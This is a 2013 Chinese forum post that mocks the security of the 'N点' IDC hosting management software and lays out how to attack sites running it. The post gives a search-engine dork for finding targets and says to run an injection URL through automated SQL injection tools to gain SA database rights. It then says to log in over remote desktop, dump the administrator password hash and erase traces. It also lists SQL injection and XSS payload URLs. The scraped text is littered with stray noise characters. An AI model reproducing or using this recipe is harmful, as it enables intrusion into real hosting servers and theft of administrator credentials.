不得不说N点实在是一个破东西8 a9 M8 ^6 n8 p n4 @/ ~+ q9 r
就算他开发的商业版,就算商业版附带了安全设置也不能掩饰他的破烂$ f& Z9 P+ @: i" t- K) R% |
好吧 抱怨一下就行了 接下来关键的时候到了
! t2 g6 m" m: u) \' b$ W# W- Y2 v+ c" x首先百度搜索关键字:inurl: (mmdatabase.asp)
) |% `! G+ t* ]: J我随便列举一个: www.xxxx.com
6 i/ @' A4 T, o6 m. u! A0 ?修改链接:http://www.xxxx.com:80/Style/new ... &RID=1&ID=10 Z# _! j3 K" a0 E* {
扔入NBSI 或者啊D等各种傻逼工具后
1 r; P9 q+ n( C你们会看到是SA权限
* A& L( R! U5 f8 C" h) @! n果断3389 上去 hash得到administrator密码* [1 u) r8 f: j, K" L) R2 j
擦屁股走人~
* o" v, Q7 o/ P经过基友本人测试10个这个程序5个以上有这个漏洞5个里面有一半是SA权限的
" e0 e9 O" P$ C0 q0 R2 l b / O8 }% Z' `7 c2 }/ h! O
再附上其他几个漏洞页面: y* }' l% Q n& E/ @: Z! y
SQL:. W% c* b1 H, L" W, |: ^1 h, l9 ?
http://www.xxxxxx.com:80/Style/flashad/flashad.asp?adid=1
% U7 R% S% f% r% G' Nhttp://www.xxxxxx.com:80/Manage/ ... ogin.asp&PID=11& S+ m, x/ u, s$ t% `2 Y
http://www.xxxxxx.com:80/Manage/ ... login.asp&PID=96 m! P7 F! z4 E* S
http://www.xxxxxx.com:80/Style/vhosting.asp?classID=2
3 `- K/ t6 H$ H& B$ d. IXSS证明:
, y( H3 O8 q$ Q3 H a. ~( lhttp://www.xxxxxx.com:80/Manage/ ... yle/memberlogin.asp”;alert(42873);”/ I$ F3 {5 H- r: k. f# z( s3 Y) e3 U
http://www.xxxxxx.com:80/Manage/ ... yle/memberlogin.asp”;alert(42873);”
5 p0 m! Q! O$ s# Lhttp://www.xxxxxx.com:80/Style/d ... mp;checkbox2=.bj.cn<script>alert(42873)</script>
* v: X* x Z9 D+ Q由此可见点就是坑逼中的战斗机 自从用了他我的眼泪都流干了 有做IDC的朋友千万别步我后尘啊 便宜没好货好货不便宜
2 d: |: F5 {' b. s5 N$ J8 C还是星外吧 你们懂的4 O7 h* o7 \' a$ E# f& G
作为一个商用程序 安全如此堪忧甚至于连网上开源的一些程序都有所不如,这样的公司能走多远?
@" n) R3 \3 X) GPS:其实我真的很想知道你说N点这SB asp就asp吧 为什么asp还非要MSSQL 这不是好像告诉我们快来日吧我们很容易日的,裤子都脱啦,就等你啦。 o(︶︿︶)o 唉
8 ~- ]1 F# ~, n Q( U——- |
发表于 2013-3-3 08:06:44
收藏
支持
反对